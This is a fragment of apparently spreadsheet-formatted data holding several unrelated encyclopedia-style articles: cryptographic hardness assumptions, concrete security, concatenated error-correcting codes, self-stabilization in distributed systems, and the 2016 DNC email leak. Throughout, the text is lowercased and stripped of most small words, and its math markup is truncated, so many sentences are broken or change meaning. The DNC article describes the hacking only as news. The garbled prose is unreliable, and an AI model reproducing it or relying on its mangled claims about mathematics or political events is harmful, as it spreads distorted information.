verifier accept assumption false. common cryptographic hardness assumptions there many cryptographic hardness assumptions use. this list common ones, cryptographic protocols them. integer factorization given composite number {\displaystyle particular product large primes {\displaystyle n=p\cdot integer factorization problem find {\displaystyle {\displaystyle (more generally, find primes {\displaystyle p_{1},\dots ,p_{k}} {\displaystyle n=\prod _{i}p_{i}} major open problem find algorithm integer factorization runs time polynomial size representation {\displaystyle \log(n)} security many cryptographic protocols rely assumption integer factorization hard (i.e. cannot solved polynomial time). cryptosystems whose security equivalent assumption include rabin cryptosystem okamoto–uchiyama cryptosystem. many cryptosystems rely stronger assumptions rsa, residuosity problems, phi-hiding. problem given composite number {\displaystyle exponent {\displaystyle number {\displaystyle c:=m^{e}(\mathrm {mod} \;n)} problem find {\displaystyle problem conjectured hard, becomes easy given factorization {\displaystyle cryptosystem, {\displaystyle (n,e)} public key, {\displaystyle encryption message {\displaystyle factorization {\displaystyle secret used decryption. residuosity problems given composite number {\displaystyle integers {\displaystyle y,d} residuosity problem determine whether exists (alternatively, find {\displaystyle {\displaystyle x^{d}\equiv y{\pmod {n}}.} important special cases include quadratic residuosity problem decisional composite residuosity problem. case rsa, problem (and special cases) conjectured hard, become easy given factorization {\displaystyle some cryptosystems rely hardness residuousity problems include: goldwasser–micali cryptosystem (quadratic redisduosity problem) blum blum shub generator (quadratic redisduosity problem) paillier cryptosystem (decisional composite residuosity problem) benaloh cryptosystem (higher residuosity problem) naccache–stern cryptosystem (higher residuosity problem) phi-hiding assumption composite number {\displaystyle known efficiently compute euler's totient function {\displaystyle \phi (m)} phi-hiding assumption postulates hard compute {\displaystyle \phi (m)} furthermore even computing prime factors {\displaystyle \phi (m)} hard. this assumption used cachin–micali–stadler protocol. discrete problem (dlp) given elements {\displaystyle {\displaystyle group {\displaystyle discrete problem asks integer {\displaystyle {\displaystyle a=b^{k}} discrete problem known comparable integer factorization, computational complexities closely related. most cryptographic protocols related discrete problem actually rely stronger diffie–hellman assumption: given group elements {\displaystyle g,g^{a},g^{b}} {\displaystyle generator {\displaystyle a,b} random integers, hard find {\displaystyle g^{a\cdot examples protocols assumption include original diffie–hellman exchange, well elgamal encryption (which relies stronger decisional diffie–hellman (ddh) variant). multilinear maps multilinear function {\displaystyle e:g_{1},\dots ,g_{n}\rightarrow g_{t}} (where {\displaystyle g_{1},\dots ,g_{n},g_{t}} groups) {\displaystyle g_{1},\dots ,g_{n}\in g_{1},\dots g_{n}} {\displaystyle a_{1},\dots ,a_{n}} {\displaystyle e(g_{1}^{a_{1}},\dots ,g_{n}^{a_{n}})=e(g_{1},\dots ,g_{n})^{a_{1}\cdots a_{n}}} .for cryptographic applications, would like construct groups {\displaystyle g_{1},\dots ,g_{n},g_{t}} {\displaystyle group operations {\displaystyle g_{1},\dots ,g_{n},g_{t}} computed efficiently, discrete problem {\displaystyle g_{1},\dots ,g_{n}} still hard. some applications require stronger assumptions, e.g. multilinear analogs diffie-hellman assumptions. special case {\displaystyle n=2} bilinear maps believable security constructed using weil pairing tate pairing. {\displaystyle n&gt;2} many constructions proposed recent years, many also broken, currently consensus safe candidate.some cryptosystems rely multilinear hardness assumptions include: boneh-franklin scheme (blinear diffie-hellman) boneh–lynn–shacham (blinear diffie-hellman) garg-gentry-halevi-raykova-sahai-waters candidate indistinguishability obfuscation functional encryption (multilinear jigsaw puzzles) lattice problems fundamental computational problem lattices shortest vector problem (svp): given lattice {\displaystyle find shortest non-zero vector {\displaystyle v\in most cryptosystems require stronger assumptions variants svp, shortest independent vectors problem (sivp), gapsvp, unique-svp.the useful lattice hardness assumption cryptography learning errors (lwe) problem: given samples {\displaystyle (x,y)} {\displaystyle y=f(x)} linear function {\displaystyle f(\cdot easy learn {\displaystyle f(\cdot using linear algebra. problem, input algorithm errors, i.e. pair {\displaystyle y\neq f(x)} small probability. errors believed make problem intractable (for appropriate parameters); particular, known worst-case average-case reductions variants svp.for quantum computers, factoring discrete problems easy, lattice problems conjectured hard. this makes lattice-based cryptosystems candidates post-quantum cryptography. some cryptosystems rely hardness lattice problems include: ntru (both ntruencrypt ntrusign) most candidates fully homomorphic encryption non-cryptographic hardness assumptions well cryptographic applications, hardness assumptions used computational complexity theory provide evidence mathematical statements difficult prove unconditionally. applications, proves hardness assumption implies desired complexity-theoretic statement, instead proving statement true. best-known assumption type assumption others include exponential time hypothesis, planted clique conjecture, unique games conjecture. {\displaystyle -hard problems many worst-case computational problems known hard even complete complexity class {\displaystyle particular np-hard (but often also pspace-hard, ppad-hard, etc.). this means least hard problem class {\displaystyle problem {\displaystyle -hard (with respect polynomial time reductions), cannot solved polynomial-time algorithm unless computational hardness assumption {\displaystyle p\neq false. exponential time hypothesis (eth) variants exponential time hypothesis (eth) strengthening {\displaystyle p\neq hardness assumption, conjectures boolean satisfiability problem polynomial time algorithm, furthermore requires exponential time {\displaystyle 2^{\omega (n)}} even stronger assumption, known strong exponential time hypothesis (seth) conjectures {\displaystyle -sat requires {\displaystyle 2^{(1-\varepsilon _{k})n}} time, {\displaystyle \lim _{k\rightarrow \infty }\varepsilon _{k}=0} eth, seth, related computational hardness assumptions allow deducing fine-grained complexity results, e.g. results distinguish polynomial time quasi-polynomial time, even 1.99 {\displaystyle n^{1.99}} versus {\displaystyle n^{2}} such assumptions also useful parametrized complexity. average-case hardness assumptions some computational problems assumed hard average particular distribution instances. example, planted clique problem, input random graph sampled, sampling erdős–rényi random graph "planting" random {\displaystyle -clique, i.e. connecting {\displaystyle uniformly random nodes (where {\displaystyle 2\log _{2}n\ll k\ll {\sqrt {n}}} goal find planted {\displaystyle -clique (which unique w.h.p.). another important example feige's hypothesis, computational hardness assumption random instances 3-sat (sampled maintain specific ratio clauses variables). average-case computational hardness assumptions useful proving average-case hardness applications like statistics, natural distribution inputs. additionally, planted clique hardness assumption also used distinguish polynomial quasi-polynomial worst-case time complexity problems, similarly exponential time hypothesis. unique games unique label cover problem constraint satisfaction problem, constraint {\displaystyle involves variables {\displaystyle x,y} value {\displaystyle unique value {\displaystyle satisfies {\displaystyle determining whether constraints satisfied easy, unique game conjecture (ugc) postulates determining whether almost constraints {\displaystyle (1-\varepsilon -fraction, constant {\displaystyle \varepsilon satisfied almost none {\displaystyle \varepsilon -fraction) satisfied np-hard. approximation problems often known np-hard assuming ugc; problems referred ug-hard. particular, assuming semidefinite programming algorithm achieves optimal approximation guarantees many important problems. small expansion closely related unique label cover problem small expansion (sse) problem: given graph {\displaystyle g=(v,e)} find small vertices size {\displaystyle n/\log(n)} whose edge expansion minimal. known hard approximate, unique label cover. hence, small expansion hypothesis, postulates hard approximate, stronger (but closely related) assumption unique game conjecture. some approximation problems known sse-hard (i.e. least hard approximating sse). 3sum conjecture given {\displaystyle numbers, 3sum problem asks whether triplet numbers whose zero. there quadratic-time algorithm 3sum, conjectured algorithm solve 3sum "truly sub-quadratic time": 3sum conjecture computational hardness assumption {\displaystyle o(n^{2-\varepsilon -time algorithms 3sum (for constant {\displaystyle \varepsilon this conjecture useful proving near-quadratic lower bounds several problems, mostly computational geometry. also security level references</t>
  </si>
  <si>
    <t>Concrete security</t>
  </si>
  <si>
    <t>cryptography, concrete security exact security practice-oriented approach aims give precise estimates computational complexities adversarial tasks polynomial equivalence would allow. quantifies security cryptosystem bounding probability success adversary running fixed amount time. security proofs precise analyses referred concrete.traditionally, provable security asymptotic: classifies hardness computational problems using polynomial-time reducibility. secure schemes defined advantage computationally bounded adversary negligible. while theoretical guarantee important, practice needs know exactly efficient reduction need instantiate security parameter enough know "sufficiently large" security parameters inefficient reduction results either success probability adversary resource requirement scheme greater desired.concrete security parametrizes resources available adversary, running time memory, resources specific system question, number plaintexts obtain number queries make oracles available. then advantage adversary upper bounded function resources problem size. often possible give lower bound (i.e. adversarial strategy) matching upper bound, hence name exact security. examples concrete security estimates applied cryptographic algorithms: 1996, schemes digital signatures based rabin cryptosystems proposed, shown approximately difficult break original cryptosystems. 1997, notions concrete security (left-or-right indistinguishability, real-or-random indistinguishability, find-then-guess security, semantic-security) symmetric encryption algorithms proved approximately equivalent various block cipher modes operation cbc, ctr, stateless variant cbc). 2017, thesis showed lattice point enumeration lattice block reduction algorithms could used attack lattice-based cryptography. 2021, "guess-and-determine" "guess-and-decode"-type attacks demonstrated proposed pseudorandom generator nc0, instances parameter values previously claimed 128-bit security solved {\displaystyle 2^{78}} operations.in addition, software tool named "foundational cryptography framework", embeds coq, able formally verify proofs concrete security. example, able verify concrete security elgamal encryption. references external links https://www.cs.purdue.edu/homes/jblocki/courses/555_fall18/slides/week2.pdf https://crypto.stanford.edu/~dabo/cryptobook/draft_0_3.pdf https://eprint.iacr.org/2006/278.pdf https://www.baigneres.net/downloads/2007_provable_security.pdf https://eprint.iacr.org/2020/1213.pdf</t>
  </si>
  <si>
    <t>Concatenated error correction code</t>
  </si>
  <si>
    <t>coding theory, concatenated codes form class error-correcting codes derived combining inner code outer code. they conceived 1966 dave forney solution problem finding code exponentially decreasing error probability increasing block length polynomial-time decoding complexity. concatenated codes became widely used space communications 1970s. background field channel coding concerned sending stream data highest possible rate given communications channel, decoding original data reliably receiver, using encoding decoding algorithms feasible implement given technology. shannon's channel coding theorem shows many common channels exist channel coding schemes able transmit data reliably rates {\displaystyle less certain threshold {\displaystyle called channel capacity given channel. fact, probability decoding error made decrease exponentially block length {\displaystyle coding scheme goes infinity. however, complexity naive optimum decoding scheme simply computes likelihood every possible transmitted codeword increases exponentially {\displaystyle optimum decoder rapidly becomes infeasible. doctoral thesis, dave forney showed concatenated codes could used achieve exponentially decreasing error probabilities data rates less capacity, decoding complexity increases polynomially code block length. description code, block code length dimension minimum hamming distance rate k/n, alphabet {\displaystyle c_{in}:a^{k}\rightarrow a^{n}} cout code alphabet |a|k symbols: {\displaystyle c_{out}:b^{k}\rightarrow b^{n}} inner code takes |a|k possible inputs, encodes n-tuple transmits, decodes possible outputs. regard (super) channel transmit symbol alphabet channel times transmit symbols codeword cout. concatenation cout outer code) inner code), denoted cout∘cin, thus code length alphabet {\displaystyle c_{out}\circ c_{in}:a^{kk}\rightarrow a^{nn}} maps input message (m1, ..., codeword (cin(m'1), cin(m'2), ..., cin(m'n)), (m'1, m'2, ..., m'n) cout(m1, ..., mk). insight approach decoded using maximum-likelihood approach (thus showing exponentially decreasing error probability increasing length), cout code length decoded polynomial time concatenated code decoded polynomial time combined length n2nr o(n⋅log(n)) shows exponentially decreasing error probability, even exponential decoding complexity. this discussed detail section decoding concatenated codes. generalization concatenation, possible inner codes cin,i i-th symbol codeword cout transmitted across inner channel using i-th inner code. justesen codes examples generalized concatenated codes, outer code reed–solomon code. properties distance concatenated code cout∘cin least [nn, code proof: consider different messages denote distance codewords. then {\displaystyle \delta (c_{out}(m^{1}),c_{out}(m^{2}))\geq thus, least positions sequence symbols codewords cout(m1) cout(m2) differ. positions, denoted {\displaystyle \delta (c_{in}(c_{out}(m^{1})_{i}),c_{in}(c_{out}(m^{2})_{i}))\geq consequently, least positions sequence symbols taken alphabet codewords differ, hence {\displaystyle \delta (c_{in}(c_{out}(m^{1})),c_{in}(c_{out}(m^{2})))\geq dd.} cout linear block codes, cout∘cin also linear block code. this property easily shown based idea defining generator matrix concatenated code terms generator matrices cout cin. decoding concatenated codes natural concept decoding algorithm concatenated codes first decode inner code outer code. algorithm practical must polynomial-time final block length. consider polynomial-time unique decoding algorithm outer code. find polynomial-time decoding algorithm inner code. understood polynomial running time means running time polynomial final block length. main idea inner block length selected logarithmic size outer code decoding algorithm inner code exponential time inner block length, thus exponential-time optimal maximum likelihood decoder (mld) inner code. detail, input decoder vector (y1, ..., (an)n. then decoding algorithm two-step process: inner code reconstruct inner code words (y'1, ..., y'n), mldcin(yi), unique decoding algorithm cout y'.now, time complexity first step o(n⋅exp(n)), o(log(n)) inner block length. words, no(1) (i.e., polynomial-time) terms outer block length outer decoding algorithm step assumed polynomial time complexity overall decoding algorithm polynomial-time well. remarks decoding algorithm described used correct errors less dd/4 number. using minimum distance decoding, outer decoder correct inputs less symbols error. similarly, inner code reliably correct input less inner symbols erroneous. thus, outer symbol incorrect inner decoding least inner symbols must error, outer code fail must happened least outer symbols. consequently, total number inner symbols must received incorrectly concatenated code fail must least d/2⋅d/2 dd/4. algorithm also works inner codes different, e.g., justesen codes. generalized minimum distance algorithm, developed forney, used correct dd/2 errors. uses erasure information inner code improve performance outer code, first example algorithm using soft-decision decoding. applications although simple concatenation scheme implemented already 1971 mariner mars orbiter mission, concatenated codes starting regularly used deep space communication voyager program, launched space probes 1977. since then, concatenated codes became workhorse efficient error correction coding, stayed least invention turbo codes ldpc codes.typically, inner code block code soft-decision convolutional viterbi-decoded code short constraint length. outer code, longer hard-decision block code, frequently reed-solomon code eight-bit symbols, used. larger symbol size makes outer code robust error bursts occur channel impairments, also erroneous output convolutional code bursty. interleaving layer usually added codes spread error bursts across wider range.the combination inner viterbi convolutional code outer reed–solomon code (known code) first used voyager became popular construction within outside space sector. still notably used today satellite communications, dvb-s digital television broadcast standard.in looser sense, (serial) combination codes referred concatenated code. example, within dvb-s2 standard, highly efficient ldpc code combined algebraic outer code order remove resilient errors left inner ldpc code inherent error floor.a simple concatenation scheme also used compact disc (cd), interleaving layer reed–solomon codes different sizes spreads errors across various blocks. turbo codes: parallel concatenation approach description given called serially concatenated code. turbo codes, described first 1993, implemented parallel concatenation convolutional codes, interleaver codes iterative decoder passes information forth back codes. this design better performance previously conceived concatenated codes. however, aspect turbo codes iterated decoding approach. iterated decoding also applied serial concatenations order achieve higher coding gains, within serially concatenated convolutional codes (scccs). early form iterated decoding implemented five iterations "galileo code" galileo space probe. also justesen code zyablov bound singleton bound gilbert–varshamov bound references further reading lin; daniel costello (1983). error control coding: fundamentals applications. prentice hall. 278–280. isbn 978-0-13-283796-5. f.j. macwilliams; n.j.a. sloane (1977). theory error-correcting codes. north-holland. 307–316. isbn 978-0-444-85193-2. external links dave forney (ed.). "concatenated codes". scholarpedia. university buffalo lecture notes coding theory atri rudra</t>
  </si>
  <si>
    <t>Self-stabilization</t>
  </si>
  <si>
    <t>self-stabilization concept fault-tolerance distributed systems. given initial state, self-stabilizing distributed system correct state finite number execution steps. first glance, guarantee self stabilization seem less promising traditional fault-tolerance algorithms, guarantee system always remains correct state certain kinds state transitions. however, traditional fault tolerance cannot always achieved. example, cannot achieved system started incorrect state corrupted intruder. moreover, complexity, hard debug analyze distributed systems. hence, hard prevent distributed system reaching incorrect state. indeed, forms self-stabilization incorporated many modern computer telecommunications networks, since gives ability cope faults foreseen design algorithm. many years seminal paper edsger dijkstra 1974, concept remains important presents important foundation self-managing computer systems fault-tolerant systems. result, dijkstra's paper received 2002 podc influential-paper award, highest recognitions distributed computing community. moreover, dijkstra's death, award renamed called dijkstra award. history e.w. dijkstra 1974 presented concept self-stabilization, prompting research area. demonstration involved presentation self-stabilizing mutual exclusion algorithms. also showed first self-stabilizing algorithms rely strong assumptions system. some previous protocols used practice actually stabilize, assuming existence clock global system, assuming known upper bound duration system transition. years later leslie lamport pointed importance dijkstra's work 1983 conference called symposium principles distributed computing researchers directed attention elegant fault-tolerance concept. talk, lamport stated:i regard dijkstra's brilliant work least, brilliant published paper. it's almost completely unknown. regard milestone work fault tolerance... regard self-stabilization important concept fault tolerance fertile field research.afterwards, dijkstra's work awarded acm-podc influential paper award, became acm's (the association computing machinery) dijkstra prize distributed computing given annual acm-podc symposium. overview distributed algorithm self-stabilizing starting arbitrary state, guaranteed converge legitimate state remain legitimate states thereafter. state legitimate starting state, algorithm satisfies specification. property self-stabilization enables distributed algorithm recover transient fault regardless nature. moreover, self-stabilizing algorithm initialized eventually starts behave correctly regardless initial state. dijkstra's paper, introduces concept self-stabilization, presents example context "token ring"—a network computers ordered circle. here, computer processor "see" whole state processor immediately precedes state imply processor "has token" "does token." requirements exactly must "hold token" given time. second requirement prescribes node "passes token" computer/processor succeeding token eventually circulates ring. holding token correct state computer network, since token held another computer. however, every computer state "not holding token" network altogether correct state. similarly, computer "holds token" correct state network, although cannot observed incorrect viewing computer individually. since every computer "observe" states neighbors, hard computers decide whether network altogether correct state.the first self-stabilizing algorithms detect errors explicitly order subsequently repair them. instead, constantly pushed system towards legitimate state. since traditional methods detecting error often difficult time-consuming, behavior considered desirable. (the method described paper cited collects huge amount information whole network place; that, attempts determine whether collected global state correct; even determination alone hard task). efficiency improvements more recently, researchers presented newer methods light-weight error detection self-stabilizing systems using local checking. general tasks.the term local refers part computer network. when local detection used, computer network required communicate entire network order detect error—the error detected computer communicate nearest neighbors. these local detection methods simplified task designing self-stabilizing algorithms considerably. this error detection mechanism recovery mechanism designed separately. newer algorithms based detection methods also turned much efficient. moreover, papers suggested rather efficient general transformers transform self stabilizing algorithms become self stabilizing. idea self stabilizing protocol, time, detect faults (during execution given protocol) using above-mentioned detection methods, then, apply (self stabilizing) "reset" protocol return system predetermined initial state, and, finally, restart given (non- self stabilizing) protocol.the combination parts self stabilizing long trigger fault correction fault phases, e.g.,). initial self stabilizing protocols also presented papers. more efficient reset protocols presented later, e.g.additional efficiency introduced notion time-adaptive protocols. idea behind small number errors occurs, recovery time (and should) made short. dijkstra's original self-stabilization algorithms property. useful property self-stabilizing algorithms composed layers layers exhibit circular dependencies. stabilization time composition bounded individual stabilization times layer.new approaches dijkstra's work emerged later case krzysztof ehsan shoja's proposition, demonstrated self-stabilization naturally formulated using standard concepts strategic games, particularly concept improvement path. this particular work sought demonstrate link self-stabilization game theory. time complexity time complexity self-stabilizing algorithm measured (asynchronous) rounds cycles. round shortest execution trace processor executes least step. similarly, cycle shortest execution trace processor executes least complete iteration repeatedly executed list commands.to measure output stabilization time, subset state variables defined externally visible (the output). certain states outputs defined correct (legitimate). outputs components system said stabilized time starts correct, provided stays correct indefinitely, unless additional faults occur. output stabilization time time (the number (asynchronous) rounds) output stabilizes. definition system self-stabilizing starting state, guaranteed system eventually reach correct state (convergence). given system correct state, guaranteed stay correct state, provided fault happens (closure).a system said randomized self-stabilizing self-stabilizing expected number rounds needed reach correct state bounded constant {\displaystyle .design self-stabilization above-mentioned sense well known difficult job. fact, class distributed algorithms property local checking: legitimacy network state cannot evaluated single process. obvious case dijkstra's token-ring defined above: process detect whether network state legitimate case token present non-neighboring processes. this suggests self-stabilization distributed system sort collective intelligence component taking local actions, based local knowledge eventually guarantees global convergence end. help overcome difficulty designing self-stabilization defined above, types stabilization devised. instance, weak stabilization property distributed system possibility reach legitimate behavior every possible state. weak stabilization easier design guarantees possibility convergence runs distributed system rather convergence every run. self-stabilizing algorithm silent converges global state values communication registers used algorithm remain fixed. related work extension concept self-stabilization superstabilization. intent cope dynamic distributed systems undergo topological changes. classical self-stabilization theory, arbitrary changes viewed errors guarantees given system stabilized again. with superstabilizing systems, passage predicate always satisfied system's topology reconfigured. references external links libcircle implementation self-stabilization using token passing termination.</t>
  </si>
  <si>
    <t>2016 Democratic National Committee email leak</t>
  </si>
  <si>
    <t>2016 democratic national committee email leak collection democratic national committee (dnc) emails stolen hackers operating pseudonym "guccifer 2.0" alleged russian intelligence agency hackers, according indictments carried mueller investigation. these emails subsequently leaked dcleaks june july 2016 wikileaks july 2016, 2016 democratic national convention. this collection included 19,252 emails 8,034 attachments dnc, governing body united states' democratic party. leak includes emails seven staff members, date january 2015 2016. november 2016, wikileaks released second batch emails, adding 8,263 emails collection.the leaks resulted allegations bias bernie sanders' presidential campaign, apparent contradiction leadership's publicly stated neutrality, several operatives openly derided sanders' campaign discussed ways advance hillary clinton's nomination. later reveals included controversial dnc–clinton agreements dated primary, regarding financial arrangements control policy hiring decisions. revelations prompted resignation chair debbie wasserman schultz 2016 democratic national convention. issued formal apology bernie sanders supporters "for inexcusable remarks made email" reflect dnc's "steadfast commitment neutrality nominating process." after convention, dacey, brad marshall, communications director luis miranda also resigned wake controversy.on december 2016, told u.s. legislators u.s. intelligence community concluded russia conducted operations 2016 u.s. election prevent hillary clinton winning presidency. multiple intelligence agencies concluded people direct ties kremlin gave wikileaks hacked emails democratic national committee. wikileaks reveal source. later julian assange, founder wikileaks, claimed source emails russia.on july 2018, special counsel robert mueller indicted russian military intelligence agents group known fancy bear alleged responsible attack, behind guccifer pseudonym claimed responsibility. contents leak emails leaked wikileaks, phases (the first july 2016 second november 2016), revealed information dnc's interactions media, hillary clinton's bernie sanders' campaigns, financial contributions. also includes personal information donors democratic party, including credit card social security numbers, could facilitate identity theft. earlier, late june 2016, guccifer instructed reporters visit dcleaks website emails stolen democrats. with wikileaks disclosure additional stolen emails beginning july 2016, 150,000 stolen emails either personal gmail addresses related hillary clinton 2016 presidential campaign published dcleaks wikileaks websites. august 2016, dcleaks released information democratic lawmakers, including personal cellphone numbers. numerous prank calls hillary clinton received disclosure along loss campaign's email security severely disrupted campaign, changed contact information october 2016 calling contacts time. media emails include staff's "off-the-record" correspondence media personalities, including reporters cnn, politico, wall street journal, washington post. bernie sanders' campaign emails, staffers derided sanders campaign. washington post reported: "many damaging emails suggest committee actively trying undermine bernie sanders's presidential campaign."in 2016 email chain, chief financial officer (cfo) brad marshall told chief executive officer, dacey, someone media sanders atheist prior west virginia primary.on 2016, national press secretary mark paustenbach sent email spokesman luis miranda mentioning controversy ensued december 2015, national data director sanders campaign three subordinate staffers accessed clinton campaign's voter information database. (the party accused sanders' campaign impropriety briefly limited access database. sanders campaign filed suit breach contract dnc, dropped suit april 2016.) paustenbach suggested incident could used promote "narrative story, bernie never together, campaign mess." rejected suggestion. washington post wrote: "paustenbach's suggestion, way, could read defense committee rather pushing negative information sanders. still committee pushing negative information candidates." debbie wasserman schultz's emails following nevada democratic convention, debbie wasserman schultz wrote jeff weaver, manager bernie sanders' campaign: "damn liar. particularly scummy barely acknowledges violent threatening behavior occurred". another email, wasserman schultz said bernie sanders, going president." other emails showed stating sanders understand democratic party.in 2016, msnbc's mika brzezinski accused bias sanders campaign called wasserman schultz step down. wasserman schultz upset negative media coverage actions, emailed political director news, chuck todd, coverage "must stop". describing coverage "last straw", ordered dnc's communications director call msnbc president phil griffin demand apology brzezinski. financial donor information according york times, cache included "thousands emails exchanged democratic officials party fund-raisers, revealing rarely seen detail elaborate, ingratiating often bluntly transactional exchanges necessary harvest hundreds millions dollars party's wealthy donor class. emails capture world seating charts arranged dollar totals mind, white house celebration pride thinly disguised occasion rewarding wealthy donors physical proximity president precious currencies." common national politics, large party donors "were subject entire dossiers, fund-raisers tried gauge interests, annoyances passions."in series email exchanges april 2016, fundraising staff discussed compiled list people (mainly donors) might appointed federal boards commissions. opensecrets senior fellow biersack noted longstanding practice united states: "big donors always risen lists appointment plum ambassadorships boards commissions around federal landscape." white house denied financial support party connected board appointments, saying: "being donor role administration, preclude getting one. we've said many years there's nothing emails released contradicts that." france 2011, france, president nicolas sarkozy, calls international intervention libyan civil war, voted favor united nations security council resolution 1973 and, subsequently, dispatched french force direct military action libya support national transitional council. time, france said move protect libyan civilians. private email sidney blumenthal hillary clinton revealed part 2016 democratic national committee email leak blumenthal claimed france concerned libya's large gold reserves, might pose threat value central african franc, thereby weakening french influence africa, sarkozy interested increased access libyan oil. former french diplomat patrick haimzadeh called blumenthal's analysis, reflected popular theory conspiracy websites, "not credible" "the timeline sarkozy's decision intervene preceding knowledge gaddafi's plans. french investigative journalist fabrice arfi dismissed blumenthal's claim "far-fetched," also acknowledging even u.s. intelligence find france's publicly stated motivations libya intervention entirely credible either. perpetrators cybersecurity analysis self-styled hacker going moniker "guccifer 2.0" claimed source leaks; wikileaks reveal source. when asked guccifer 2.0's leaks, wikileaks founder julian assange said "these look much like they’re russians. ways, look amateur, almost look much like russians." cybersecurity experts firms, including crowdstrike, fidelis cybersecurity, mandiant, secureworks, threatconnect, editor technica, stated leak part series cyberattacks committed russian intelligence groups. u.s. intelligence agencies also stated (with "high confidence") russian government behind theft emails documents dnc, according reports york times washington post.wikileaks founder julian assange initially stuck wikileaks policy neither confirming denying sources january 2017 said "source russian government state party", russian government said involvement.comey testified requested, receive, physical access servers. according comey, obtain copies servers information them, well access forensics crowdstrike, third-party cybersecurity company reviewed servers. comey said access crowdstrike "appropriate substitute" called firm "highly respected private company." united states intelligence conclusions october 2016, united states department homeland security office director national intelligence stated intelligence community "confident" russian government directed breaches release obtained allegedly obtained material attempt "... interfere election process."the u.s. intelligence community tasked resources debating putin chose summer 2016 escalate active measures influencing u.s. politics. director national intelligence james clapper said 2011–13 russian protests, putin's confidence viability politician damaged, putin responded propaganda operation. former officer patrick skinner explained goal spread uncertainty. u.s. congressman adam schiff, ranking member house permanent select committee intelligence, commented putin's aims, said u.s. intelligence agencies concerned russian propaganda. speaking disinformation appeared hungary, slovakia, czech republic, poland, schiff said increase behavior u.s. schiff concluded russian propaganda operations would continue u.s. election.on december 2016, told u.s. legislators u.s. intelligence community concluded russia conducted operations 2016 u.s. election assist donald trump winning presidency. multiple intelligence agencies concluded people direct ties kremlin gave wikileaks hacked emails additional sources john podesta, campaign chairman hillary clinton. these intelligence organizations additionally concluded russia attempted hack republican national committee (rnc) well prevented security defenses network.in december 2016, said foreign intelligence agents russian operatives previously known u.s. officials told u.s. senators "quite clear" russia's intentions help trump. trump released statement december disregarded conclusions.in june 2017, former secretary homeland security johnson, appointed served president barack obama, testified house select committee department offered assistance campaign determine happened server, said efforts "rebuffed" department homeland security offering provide assistance months provided assistance.throughout late 2017 early 2018, numerous individuals gave testimonies house permanent select committee intelligence (hpsci) charged carrying investigation series cyberattacks. reactions july 2016, dmitry peskov, press secretary russian president vladimir putin, stated russian government involvement hacking incident. peskov called "paranoid" "absurd", saying: seeing maniacal attempts exploit russian theme election campaign." that position later reiterated russian embassy washington, called allegation "entirely unrealistic".then-republican nominee donald trump said twitter: "leaked e-mails show plans destroy bernie sanders. mock heritage much more. on-line wikileakes [sic], really vicious. rigged."the leak fueled tensions going 2016 democratic national convention: although operatives initially denied accusations bias, sanders operatives multiple media commentators cited leaks clear evidence favoring clinton undermining sanders. several media commentators disputed significance emails, arguing dnc's internal preference clinton historically unusual unlikely swayed final outcome primary; whereas many sanders' supporters viewed revelations symptomatic entrenched, unethical political establishment.on july 2016, sanders urged wasserman schultz resign following leak stated "disappointed" leak, "not shocked." jeff weaver, bernie sanders' campaign manager, called greater accountability dnc, calling wasserman schultz figure disunity" within democratic party. later day, wasserman schultz resigned position chairman, effective nominating convention. after wasserman schultz resigned, sanders said "made right decision future democratic party." following day, apologized bernie sanders supporters, stating, behalf everyone dnc, want offer deep sincere apology senator sanders, supporters, entire democratic party inexcusable remarks made email," emails reflect dnc's "steadfast commitment neutrality nominating process." july 2016, interview npr, former chair current governor virginia terry mcauliffe said "... chair's remain neutral." chair 2004 trying navigate different candidates had. people trashing candidates, tell this, still chairman working there. mean, totally unacceptable behavior."on july 2016, anthony zurcher, north america reporter bbc, commented "the revelation heart democratic establishment sought undermine anti-establishment sanders roughly [casablanca character] police capt renault's professed shock gambling taking place casablanca club raiding, waiter hands winnings."on july 2016, republican national committee chairman reince priebus said "today's events show really uphill climb democrats facing week unifying party. starting week losing party chairman longstanding bitterness factions keep something together."after emails released, australian diplomat alexander downer informed u.s. government that, 2016 london wine bar, trump campaign staffer george papadopoulos told russian government large trove hillary clinton emails could potentially damage presidential campaign. started counterintelligence investigation possible russian interference 2016 u.s. presidential election.on october 2016, news reported multiple sources telling barack obama ordered present options retaliatory cyber attack russian federation allegedly interfering presidential election. sources said first time presented options president, previous occasions decision made carry proposed attacks. media coverage public perception july 2016, york times reported julian assange, interview british june 2016, "made clear hoped harm hillary clinton's chances winning presidency", later interview program democracy now! july 2016, first democratic national convention, acknowledged timed release coincide democratic convention." interview cnn, assange would neither confirm deny wikileaks' sources were; claimed website "... might release material" relevant electoral campaign ..."following publication stolen emails, whistleblower edward snowden criticized wikileaks wholesale leakage data, writing "their hostility even modest curation mistake." washington post contrasted difference wikileaks' practices snowden's disclosure information nsa: snowden worked journalists documents (withholding would endanger national security), wikileaks' "more radical" approach involves dumping "massive, searchable caches online few—if any—apparent efforts remove sensitive personal information."on july 2016, anne applebaum, columnist washington post, wrote that: exception people twitter handful print journalists, covering story, especially television, interested nature hackers, asking russians apparently chose pass emails wikileaks particular moment, democratic national convention. they focusing instead content meant private emails went describe detail russian destabilization campaigns eastern european countries.on july 2016, thomas rid, professor security studies king's college, london, non-resident fellow school advanced international studies, johns hopkins university, washington, summed evidence pointing russia behind hacking files "guccifer-branded leaking operation". concludes actions successfully blunted "dnc's ability opposition research surprise trump ..." writes data exfiltration political organizations done many countries considered legitimate form intelligence work. "but digitally exfiltrating publishing possibly manipulated documents disguised freewheeling hacktivism crossing line setting dangerous precedent: authoritarian country directly covertly trying sabotage american election."russian security expert investigative journalist andrei soldatov said almost impossible know sure whether russia behind hack dnc's servers". according him, reasons russia would sway presidential election russian government considers clinton hater russia": "there mentality russia besieged; always attack united states they trying interfere internal affairs thing them?" civil lawsuit april 2018, democratic national committee filed civil lawsuit federal court york, accusing russian government, trump campaign, wikileaks, others conspiracy alter course 2016 presidential election asking monetary damages declaration admitting guilt. hearing defendants' motions dismiss scheduled 2018. july 2019, suit dismissed prejudice. judgement, federal judge john koeltl said although believed russian government involved hacking, federal generally prohibited suits foreign governments. judge said defendants, "did participate wrongdoing obtaining materials first place" therefore within publishing information. also said dnc's argument "entirely divorced facts" even russians directly provided hacked documents trump team, would criminal campaign publish documents, long contribute hacking itself. koeltl denied defendants motion sanctions, dismissed suit prejudice, meaning substantive legal defect could refiled. also democratic national committee cyber attacks plot hack america podesta emails russian involvement 2016 united states presidential election references</t>
  </si>
  <si>
    <t>Rebound attack</t>
  </si>
  <si>
